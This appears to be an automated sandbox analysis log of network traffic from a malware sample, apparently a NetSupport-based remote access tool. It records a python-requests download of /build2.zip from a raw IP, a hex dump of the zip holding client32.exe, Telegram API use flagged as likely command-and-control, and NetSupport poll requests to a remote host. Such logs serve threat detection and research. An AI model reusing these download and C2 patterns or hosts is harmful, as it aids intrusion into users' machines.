                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Uses the Telegram API (likely for C&C communication)
                                Source: unknownDNS query: name: api.telegram.org
                                Source: global trafficTCP traffic: 192.168.2.4:49733 -> 64.190.113.159:1488
                                Source: global trafficTCP traffic: 192.168.2.4:62121 -> 162.159.36.2:53
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                                Source: Joe Sandbox ViewIP Address: 104.26.1.231 104.26.1.231
                                Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                                Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                                Source: Joe Sandbox ViewASN Name: TRAVELCLICKCORP1US TRAVELCLICKCORP1US
                                Source: unknownDNS query: name: api.ipify.org
                                Source: unknownDNS query: name: api.ipify.org
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE11ED57C0 recv,1_2_00007FFE11ED57C0
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 22 Feb 2025 01:32:25 GMTContent-Type: application/zipContent-Length: 2186234Last-Modified: Thu, 13 Feb 2025 23:11:45 GMTConnection: keep-aliveETag: "67ae7c31-215bfa"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 8d 68 44 43 9d 9e 25 e6 21 6c 00 00 90 95 01 00 0c 00 00 00 63 6c 69 65 6e 74 33 32 2e 65 78 65 ec 7c 07 58 54 47 f7 fe 59 7a 97 22 2a 31 f9 2c 9f 26 c6 44 a3 89 f1 1f 45 11 45 ec 82 f4 b2 4b 59 96 6a 45 05 d4 28 89 25 c9 a7 62 8d 1a 8d c6 c4 28 d2 17 a4 58 c0 5e a2 62 d4 18 5b 62 8f c6 42 ef 9d c5 f3 3f 33 bb 4b 51 b0 62 e2 ef 79 3c 77 df 7b 67 ee 9c 39 33 f7 be 67 ce cc 5c 7c 1c ef be 0a 54 01 40 8d 80 08 b0 07 e4 62 09 4f 97 bf 08 06 9d 32 0c 20 4d fb 4c 97 3d 82 71 67 ba 38 06 06 cd ec 1c 3c 63 5a c0 0c f1 94 ce 12 f1 d4 a9 d3 42 3a fb f8 75 9e 11 3a b5 73 d0 d4 ce c3 6d 1d 3a 4f 99 e6 eb d7 5b 5f 5f a7 9b c2 46 ed 29 cd 43 07 e3 83 d6 28 b1 eb 42 cd 9a fd 74 8d ec 5f be 66 1f bf 17 b8 26 83 e7 8f ac 39 c0 af a5 8a 6b 19 bf da 07 49 02 59 bd 96 fa 38 c1 1a 60 9c 40 0d b6 05 8d b7 6f e8 b7 8a 40 57 a0 03 a0 42 99 30 01 bf d7 d9 90 4e 0c 9d 41 fe f4 86 c0 cb d5 41 5e ae bc c2 21 01 7f 59 83 02 55 a8 d8 f2 6b ae c8 74 eb af f5 17 2e 83 c8 de 20 96 e8 43 55 a7 0b 1a 0a e6 09 60 95 19 5d 77 08 a0 2d 6b 96 f4 de 86 e7 90 a7 e8 f7 0e f1 9b 1d c2 cc 03 d4 3f 0b a8 3d 66 c2 bb f7 0c 5f 71 88 18 c0 59 20 bf c1 f5 34 1a 74 14 6f c3 b2 f7 8c 99 33 24 a0 78 06 7a 16 98 41 57 ad e6 f4 fc 26 4f 23 c5 c9 20 7f 36 6e ef 73 c1 a3 7a c3 e0 8d bc 16 e2 14 91 17 61 dd 36 62 bc e1 04 bb ac 8d 94 f7 38 62 08 a7 1b 09 95 2f ca 1b ee 8c a6 d0 d9 12 22 8a 96 6a 0c ea 1a da 69 e9 08 c1 88 af 0e 85 b4 59 3e 1a 06 75 0d d1 97 67 43 cb e6 5b 74 0d d5 1f 91 ab 33 a8 73 98 c6 88 f9 16 9d 67 d5 2c d5 20 35 bd 41 9d 67 69 29 75 96 5b ef 9b 70 c2 3a 8b 35 8d a6 7a 64 b3 c2 3a 4b d0 66 b7 75 5e a8 fa 1e 1d 36 5e 9d 27 c2 44 2a d2 a2 a2 09 59 9e 88 38 01 4d d5 28 73 1a bb b7 ed fc 2c 51 e9 8d 3c 8f dc a7 31 9f 42 38 44 b8 d8 59 7e 6f 6d e7 26 2a f5 b1 93 0d 65 1b 82 56 17 82 26 c0 b2 46 7a 51 94 6e 4b 98 dd e8 5e 55 67 45 4c 69 46 9e d4 ae 0a 78 d9 38 8c b7 9a 1c e4 37 35 e4 93 8f 2d 3f 23 af b0 1a 6d 35 ee 93 8f 7b fb 4e 9e 0c 66 02 eb d9 41 21 13 66 4c 93 f8 cd 9c 09 a6 2a 23 fd 42 c6 4f f3 0d 9d ec 37 4a 3c d5 77 b2 df 50 00 1f 76 cf 21 44 3c 23 24 34 78 f4 54 ff 69 43 e1 1b 01 dd b1 9a 36 65 0a a9 8c 0b 9a 4a 4a 63 ad ed 6d ac 95 26 49 ec 1d 86 3b 5c 1b 5c d7 bf eb a7 f9 a3 97 67 1a c4 0e 36 d9 e6 cf a2 96 f5 40 d1 d4 99 53 66 ce 90 b0 8b a8 ef c7 7d fa c8 4f 12 45 ef 44 f6 7e 93 fd c4 33 fd ea 6f f4 0e f6 f5 81 ff 7b 22 9f 1a d4 f9 5a 80 5e f8 7c 36 05 2c a6 ab 01 5d b7 d0 d5 10 f8 da 60 7e 07 ba 9e a3 6b d3 7a 5a 7c 76 cc a2 fb cc 47 28 33 9f d9 e9 40 57 56 de 87 ae ea 74 1d 25 90 db f5 a6 2b b9 0f cc a6 2b 9b 42 56 09 1e b5 27 e0 73 56 4c 33 f7 b3 55 f9 14 fc d8 7d d6 fe 9f 2d dc 2f 6a ce 3e 35 ac a5 02 d0 dc fd 0e 2d dc ef d1 c2 fd cf 5a b8 3f aa 85 fb ae 2d dc 0f 6c e1 fe ec 16
                                Source: global trafficHTTP traffic detected: GET /build2.zip HTTP/1.1Host: 147.45.198.181User-Agent: python-requests/2.22.0Accept-Encoding: gzip, deflateAccept: */*Connection: keep-alive
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficDNS traffic detected: DNS query: geo.netsupportsoftware.com
                                Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                                Source: global trafficDNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
                                Source: global trafficDNS traffic detected: DNS query: 197.87.175.4.in-addr.arpa
                                Source: unknownHTTP traffic detected: POST http://64.190.113.159/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 64.190.113.159Connection: Keep-AliveCMD=POLLINFO=1ACK=1Data Raw: Data Ascii:
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 22 Feb 2025 01:32:31 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 915b3908b9fc0f87-EWRCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W2HXB91e1lwmzs5p6tX4H%2FNoiw8o2bedC%2BPQp%2Fw3I%2FZDXvIUdAZjMcESvtLNRd2VXQasqFFtzFW4%2BsxOLph6O3wx9QGmNiMSAXrmvnDkToY%2B4zef6zzsnVmjUlmxmRBqROz8j1uEPe0Us2L7"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareserver-timing: cfL4;desc="?proto=TCP&rtt=1492&min_rtt=1492&rtt_var=746&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 